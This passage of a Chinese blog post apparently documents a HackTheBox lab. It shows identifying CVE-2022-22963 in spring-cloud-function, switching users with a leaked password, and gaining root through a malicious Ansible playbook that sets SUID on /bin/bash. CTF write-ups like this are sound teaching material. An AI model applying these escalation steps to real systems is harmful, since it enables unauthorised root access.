class="language-xml">	<span class="hljs-tag">&lt;<span class="hljs-name">properties</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">java.version</span>&gt;</span>11<span class="hljs-tag">&lt;/<span class="hljs-name">java.version</span>&gt;</span></span><br><span class="language-xml">	<span class="hljs-tag">&lt;/<span class="hljs-name">properties</span>&gt;</span></span><br><span class="language-xml">	<span class="hljs-tag">&lt;<span class="hljs-name">dependencies</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">  			<span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>com.sun.activation<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span></span><br><span class="language-xml">  			<span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>javax.activation<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span></span><br><span class="language-xml">  			<span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>1.2.0<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.springframework.boot<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>spring-boot-starter-thymeleaf<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.springframework.boot<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>spring-boot-starter-web<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.springframework.boot<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>spring-boot-devtools<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">scope</span>&gt;</span>runtime<span class="hljs-tag">&lt;/<span class="hljs-name">scope</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">optional</span>&gt;</span>true<span class="hljs-tag">&lt;/<span class="hljs-name">optional</span>&gt;</span></span><br><span class="language-xml">	    <span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">	    <span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.springframework.cloud<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>spring-cloud-function-web<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>3.2.2<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.springframework.boot<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>spring-boot-starter-test<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">scope</span>&gt;</span>test<span class="hljs-tag">&lt;/<span class="hljs-name">scope</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.webjars<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>bootstrap<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>5.1.3<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.webjars<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>webjars-locator-core<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span></span><br><span class="language-xml">	<span class="hljs-tag">&lt;/<span class="hljs-name">dependencies</span>&gt;</span></span><br><span class="language-xml">	<span class="hljs-tag">&lt;<span class="hljs-name">build</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">plugins</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;<span class="hljs-name">plugin</span>&gt;</span></span><br><span class="language-xml">				<span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.springframework.boot<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span></span><br><span class="language-xml">				<span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>spring-boot-maven-plugin<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span></span><br><span class="language-xml">				<span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>$</span><span class="hljs-template-variable">&#123;parent.version&#125;</span><span class="language-xml"><span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span></span><br><span class="language-xml">			<span class="hljs-tag">&lt;/<span class="hljs-name">plugin</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;/<span class="hljs-name">plugins</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">finalName</span>&gt;</span>spring-webapp<span class="hljs-tag">&lt;/<span class="hljs-name">finalName</span>&gt;</span></span><br><span class="language-xml">	<span class="hljs-tag">&lt;/<span class="hljs-name">build</span>&gt;</span></span><br><span class="language-xml"><span class="hljs-tag">&lt;/<span class="hljs-name">project</span>&gt;</span></span><br></code></pre></td></tr></table></figure>

<ul>
<li>搜索组件<code>spring-cloud-function-web:3.2.2</code>相关的漏洞，发现可以 RCE 的 CVE-2022-22963。</li>
</ul>
<p><img src="https://note.youdao.com/yws/res/19845/C17E8D10767A4E9B86940D1D6F1849F4" srcset="/img/loading.gif" lazyload alt="image"></p>
<p><img src="https://note.youdao.com/yws/res/19851/EEE0C3F8CDA94777AF3686E1B04CCD8E" srcset="/img/loading.gif" lazyload alt="image"></p>
<ul>
<li><p>优化一下shell</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros">python3 -c <span class="hljs-string">&#x27;import pty;pty.spawn (&quot;/bin/bash&quot;)&#x27;</span><br><span class="hljs-built_in">export</span> <span class="hljs-attribute">TERM</span>=screen<br></code></pre></td></tr></table></figure>
</li>
<li><p>由于权限问题，frank用户无法读取user.txt。利用 <code>phil:DocPhillovestoInject123</code> 切换用户，成功读取到user.txt。</p>
</li>
</ul>
<p><img src="https://note.youdao.com/yws/res/20002/WEBRESOURCEcce7e9c52708a38fd4e409706f284644" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<h2 id="Root-Privilege"><a href="#Root-Privilege" class="headerlink" title="Root Privilege"></a>Root Privilege</h2><ul>
<li>上传pspy64，执行发现root执行的命令中多次出现 <code>ansible</code> 和 <code>playbook</code> 等关键词。</li>
</ul>
<p><img src="https://note.youdao.com/yws/res/19866/WEBRESOURCE84ffb26a0fef892225cef24541455d10" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<blockquote>
<p>ansible 是一种自动化工具，它可以用于管理和配置远程主机。而 playbook 是 ansible 的一种语言格式，用于定义和描述 ansible 的自动化任务。因此，可以说 ansible 和 Playbook 是密切相关的。<br>具体来说，ansible 使用 playbook 来执行各种任务和配置项，包括远程命令、文件操作、软件安装、服务管理等。playbook 文件通常采用 YAML 格式，用于描述各种任务和配置项，以及任务执行的条件和流程控制等。在 playbook 文件中，可以定义主机、变量、任务、处理程序、模板、文件、角色等各种组件，以实现灵活、可重用和可维护的自动化任务。<br>因此，可以将 playbook 视为 ansible 自动化任务的核心，是实现 ansible 自动化的关键组件之一。而 ansible 则提供了一系列命令和工具，用于管理、配置和执行 playbook，以便实现对远程主机的自动化操作。<br>ansible-parallel 是 ansible 的一个插件，可以在 ansible playbook 执行过程中启用并行执行，以提高任务的执行效率和速度。<br>playbook的具体细节请参考<a target="_blank" rel="noopener" href="https://ansible-tran.readthedocs.io/en/latest/index.html">在线文档</a></p>
</blockquote>
<ul>
<li>尝试通过 <code>/usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml</code> 进行提权。但是查看 <code>/opt/automation/tasks/playbook_1.yml</code> 的信息，发现无法通过修改该文件来提权。</li>
</ul>
<p><img src="https://note.youdao.com/yws/res/19874/WEBRESOURCE1dab7f3420430d807a7767fac937bb16" srcset="/img/loading.gif" lazyload alt="image.png" title="image.png"></p>
<ul>
<li>考虑 <code>/bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml</code> 会执行 <code>/opt/automation/tasks/</code> 目录下的所有 yml 文件。查看tasks 目录发现<code>frank</code>用户无法在此创建新文件，但是同在 <code>staff</code> 组的 <code>phil</code> 用户可以在 tasks 文件夹中创建新文件</li>
</ul>
<p><img src="https://note.youdao.com/yws/res/19872/WEBRESOURCE7d9183a1f1c6428c4436b56998614d2e" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<ul>
<li><p>创建 <code>playbook_2.yml</code> 文件，使其给 <code>/bin/bash</code> 的属主添加 <code>suid</code> 权限。</p>
<figure class="highlight nestedtext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs nestedtext"><span class="hljs-bullet">-</span> <span class="hljs-string">hosts: localhost</span><br>  <span class="hljs-attribute">tasks</span><span class="hljs-punctuation">:</span><br>    <span class="hljs-bullet">-</span> <span class="hljs-string">name: exp</span><br>      <span class="hljs-attribute">command</span><span class="hljs-punctuation">:</span> <span class="hljs-string">chmod u+s /bin/bash</span><br></code></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/res/19881/WEBRESOURCE492b28cee0f3624f465635b38f293372" srcset="/img/loading.gif" lazyload alt="image.png"></p>
</li>
<li><p>随后，执行<code>/bin/bash -p</code> 即可获得root权限</p>
</li>
</ul>
<p><img src="https://note.youdao.com/yws/res/19883/WEBRESOURCEc1977eade062abc101a42b2ac0ea31b8" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<h2 id="Surmary"><a href="#Surmary" class="headerlink" title="Surmary"></a>Surmary</h2><ul>
<li>对于一个应用，不仅要注意其版本信息，也要注意其使用的组件版本信息；</li>
<li>一定一定要先看各个应用的配置文件，其次是源码；</li>
<li>除了常规的 suid 提权，内核漏洞等等，还可以使用<code>pspy</code>工具查看目标机器上 root 用户用什么命令创建了什么进程。</li>
</ul>
<h2 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h2><ul>
<li><a target="_blank" rel="noopener" href="https://github.com/darryk10/CVE-2022-22963">https://github.com/darryk10/CVE-2022-22963</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_44281295/article/details/126573730">https://blog.csdn.net/qq_44281295/article/details/126573730</a></li>
<li><a target="_blank" rel="noopener" href="https://ansible-tran.readthedocs.io/en/latest/index.html">https://ansible-tran.readthedocs.io/en/latest/index.html</a></li>
</ul>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CVE/">CVE</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/hackthebox/">hackthebox</a>
                    
                      <a class="hover-with-bg" href="/tags/ansible/">ansible</a>
                    
                      <a class="hover-with-bg" href="/tags/spring-boot/">spring-boot</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/05/16/2022%E6%98%A5%E7%A7%8B%E6%9D%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%81%94%E8%B5%9B-%E6%98%A5%E5%AD%A3%E8%B5%9BPwn%E9%A2%98/">
                        <span class="hidden-mobile">2022春秋杯网络安全联赛-春季赛Pwn题</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1/dist/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"2GYV17CUmss2VIOWS1MFpfqj-gzGzoHsz","appKey":"0R4wcvymx9kXQiyeaw8t2otu","path":"window.location.pathname","placeholder":"说点什么吧","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          Fluid.plugins.initFancyBox('#valine .vcontent img:not(.vemoji)');
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/RunData.js"></script> </div> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
